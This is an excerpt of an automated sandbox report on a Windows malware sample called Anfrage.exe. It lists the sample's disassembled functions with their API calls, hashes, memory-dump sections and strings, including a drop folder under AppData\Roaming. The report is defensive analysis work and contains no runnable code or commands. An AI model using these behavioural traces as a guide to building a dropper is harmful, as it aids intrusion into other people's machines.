                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: 84c91d76a83be332908af776156b545b11287c12e2770689e8b3db02ea887268
                                                                          • Instruction ID: 1ed90d873f298f356d36a2c1dae4bb172ade26fd4588ec9ef5a2339dc9f33d8e
                                                                          • Opcode Fuzzy Hash: 84c91d76a83be332908af776156b545b11287c12e2770689e8b3db02ea887268
                                                                          • Instruction Fuzzy Hash: 11E0EC3221425AABDF609E65DC04AEB7B7CFB05360F014436F925E6190D631F821DFA5
                                                                          Function 00405AAE Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403158,00000000,00000000,00402F82,000000FF,00000004,00000000,00000000,00000000), ref: 00405AC2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 7a5894fcc52b5b75c83558307916cd1b307e449aca39369e2409f4e78c5f9a6a
                                                                          • Instruction ID: e0af876c1f8b3f6a8543b45de02fe6ba5ae560271bae9c5b6a9092efc5817470
                                                                          • Opcode Fuzzy Hash: 7a5894fcc52b5b75c83558307916cd1b307e449aca39369e2409f4e78c5f9a6a
                                                                          • Instruction Fuzzy Hash: FCE0463220029AABCF10AE509C40AAB3B6CEB00261F104832B916E3080E2B0E8209FA4
                                                                          Function 1000270B Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2139530556.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.2139512227.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2139550102.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2139589277.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                          • Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
                                                                          • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                          • Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19
                                                                          Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 2311168178740a320a7838dbc888e64bfba08100527ad66c07f3f89ca227bd51
                                                                          • Instruction ID: e24d852e2ad3a8f86fdc323a2a6250be89694c15614e2f118570afc755bb50f4
                                                                          • Opcode Fuzzy Hash: 2311168178740a320a7838dbc888e64bfba08100527ad66c07f3f89ca227bd51
                                                                          • Instruction Fuzzy Hash: 4DD05B72704115D7CB10EBE5EF0869D77B09B50364F304137D251F31D0D6BACA559729
                                                                          Function 0040315B Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EC1,?), ref: 00403169
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: FilePointer
                                                                          • String ID:
                                                                          • API String ID: 973152223-0
                                                                          • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                          • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                          • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                          • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                          Function 00403FDD Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageA.USER32(00000028,?,00000001,00403E0E), ref: 00403FEB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
                                                                          • Instruction ID: 0adc9c0e194aa77c868d6ef978719a9753de7db756a7c543b14a3307e76eee0a
                                                                          • Opcode Fuzzy Hash: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
                                                                          • Instruction Fuzzy Hash: B2B09235280A00AAEA215B00DE09F467A62A764701F408038B240250B1CAB200A6DB18
                                                                          Function 10001215 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2139530556.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.2139512227.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2139550102.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2139589277.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: AllocGlobal
                                                                          • String ID:
                                                                          • API String ID: 3761449716-0
                                                                          • Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                                          • Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
                                                                          • Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                                          • Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39

                                                                          Non-executed Functions

                                                                          Function 0040511A Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,00000403), ref: 00405179
                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405188
                                                                          • GetClientRect.USER32(?,?), ref: 004051C5
                                                                          • GetSystemMetrics.USER32(00000002), ref: 004051CC
                                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004051ED
                                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004051FE
                                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405211
                                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040521F
                                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405232
                                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405254
                                                                          • ShowWindow.USER32(?,00000008), ref: 00405268
                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405289
                                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405299
                                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052B2
                                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004052BE
                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405197
                                                                            • Part of subcall function 00403FDD: SendMessageA.USER32(00000028,?,00000001,00403E0E), ref: 00403FEB
                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004052DA
                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000050AE,00000000), ref: 004052E8
                                                                          • CloseHandle.KERNEL32(00000000), ref: 004052EF
                                                                          • ShowWindow.USER32(00000000), ref: 00405312
                                                                          • ShowWindow.USER32(?,00000008), ref: 00405319
                                                                          • ShowWindow.USER32(00000008), ref: 0040535F
                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405393
                                                                          • CreatePopupMenu.USER32 ref: 004053A4
                                                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004053B9
                                                                          • GetWindowRect.USER32(?,000000FF), ref: 004053D9
                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053F2
                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040542E
                                                                          • OpenClipboard.USER32(00000000), ref: 0040543E
                                                                          • EmptyClipboard.USER32 ref: 00405444
                                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 0040544D
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405457
                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040546B
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405484
                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 0040548F
                                                                          • CloseClipboard.USER32 ref: 00405495
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                          • String ID:
                                                                          • API String ID: 590372296-0
                                                                          • Opcode ID: 312e192eeff1604f0d32da701c70530a671f57ed31088441950e93b34a7e48bf
                                                                          • Instruction ID: 5613d7aab8632e27e9dc55abe2e0ca372eedffe8b3e0cf91bb1740b35a121942
                                                                          • Opcode Fuzzy Hash: 312e192eeff1604f0d32da701c70530a671f57ed31088441950e93b34a7e48bf
                                                                          • Instruction Fuzzy Hash: 8AA14770900608BFDB11AFA1DE89EAE7F79EB08344F40403AFA01B61A0C7755E51DF68
                                                                          Function 004043E6 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404435
                                                                          • SetWindowTextA.USER32(00000000,?), ref: 0040445F
                                                                          • SHBrowseForFolderA.SHELL32(?,00429C40,?), ref: 00404510
                                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040451B
                                                                          • lstrcmpiA.KERNEL32(Call,0042A868), ref: 0040454D
                                                                          • lstrcatA.KERNEL32(?,Call), ref: 00404559
                                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040456B
                                                                            • Part of subcall function 0040559D: GetDlgItemTextA.USER32(?,?,00000400,004045A2), ref: 004055B0
                                                                            • Part of subcall function 0040602E: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Anfrage.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000,0040317E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 00406086
                                                                            • Part of subcall function 0040602E: CharNextA.USER32(?,?,?,00000000), ref: 00406093
                                                                            • Part of subcall function 0040602E: CharNextA.USER32(?,"C:\Users\user\Desktop\Anfrage.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000,0040317E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 00406098
                                                                            • Part of subcall function 0040602E: CharPrevA.USER32(?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000,0040317E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 004060A8
                                                                          • GetDiskFreeSpaceA.KERNEL32(00429838,?,?,0000040F,?,00429838,00429838,?,00000001,00429838,?,?,000003FB,?), ref: 00404629
                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404644
                                                                            • Part of subcall function 0040479D: lstrlenA.KERNEL32(0042A868,0042A868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046B8,000000DF,00000000,00000400,?), ref: 0040483B
                                                                            • Part of subcall function 0040479D: wsprintfA.USER32 ref: 00404843
                                                                            • Part of subcall function 0040479D: SetDlgItemTextA.USER32(?,0042A868), ref: 00404856
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                          • String ID: A$C:\Users\user\AppData\Roaming\secretaryships$Call
                                                                          • API String ID: 2624150263-1607129744
                                                                          • Opcode ID: 69f74c01cbdcf11024f72d1cffdf5a9e01e05ddb1b066f3c04d727bfc8a1ec56
                                                                          • Instruction ID: 84c50741fe25a173814362b43a11873bd68750411b15b34785129881091ebc45
                                                                          • Opcode Fuzzy Hash: 69f74c01cbdcf11024f72d1cffdf5a9e01e05ddb1b066f3c04d727bfc8a1ec56
                                                                          • Instruction Fuzzy Hash: 14A1A5B1900209ABDB11AFA6DD45AAF7BB8EF85314F10843BF601B62D1D77C89418F69
                                                                          Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540stringmemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                          • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
                                                                          • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                          • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                          • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                          • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                          • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                          • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2139530556.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.2139512227.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2139550102.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2139589277.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$lstrcpy$Alloc
                                                                          • String ID:
                                                                          • API String ID: 4227406936-0
                                                                          • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                          • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                          • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                          • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                                                          Function 004020CD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00408514,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214C
                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F8
                                                                          Strings
                                                                          • C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic, xrefs: 0040218C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                                          • String ID: C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic
                                                                          • API String ID: 123533781-3139010620
                                                                          • Opcode ID: f209c091181f227ba522424908b8d9506dcc11acb2a5460ac331969599ead195
                                                                          • Instruction ID: a586864d88b4a31a2ea0730a18160f458de020bca495768a6a410d99a7d95100
                                                                          • Opcode Fuzzy Hash: f209c091181f227ba522424908b8d9506dcc11acb2a5460ac331969599ead195
                                                                          • Instruction Fuzzy Hash: B4510975A00208BFCB10DFE4CA88A9DBBB6AF48314B2445AAF515FB2D0DA799941CB54
                                                                          Function 0040655F Relevance: .3, Instructions: 334COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f6ffbaa9ab06301a7bcd3d44d98f200676c8088fe61cb4b9d184fb53f21b8863
                                                                          • Instruction ID: 8293cd2a5013187d15d39c8039833727f4f8195ddf88bee04d9fcabafb2459e2
                                                                          • Opcode Fuzzy Hash: f6ffbaa9ab06301a7bcd3d44d98f200676c8088fe61cb4b9d184fb53f21b8863
                                                                          • Instruction Fuzzy Hash: 0EE17B71900709DFDB24CF58C980BAABBF1EB44305F15893EE497A72D1E778AA91CB04
                                                                          Function 00406D36 Relevance: .3, Instructions: 300COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2f5d6bccd3c6e1d066a3a8cc38ddd8851f0bfc94fc623702177b12c8f33284cd
                                                                          • Instruction ID: 9f21e3e235d98a7e1251c5e66270d761edb2065f660f80fa18d1a92bf6754199
                                                                          • Opcode Fuzzy Hash: 2f5d6bccd3c6e1d066a3a8cc38ddd8851f0bfc94fc623702177b12c8f33284cd
                                                                          • Instruction Fuzzy Hash: 2DC13971E0021A8BCF14CF68D5905EEBBB2BF98314F26826AD85677384D734A952CF94
                                                                          Function 004040F1 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205windowstringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040417C
                                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 00404190
                                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041AE
                                                                          • GetSysColor.USER32(?), ref: 004041BF
                                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041CE
                                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004041DD
                                                                          • lstrlenA.KERNEL32(?), ref: 004041E0
                                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004041EF
                                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404204
                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404266
                                                                          • SendMessageA.USER32(00000000), ref: 00404269
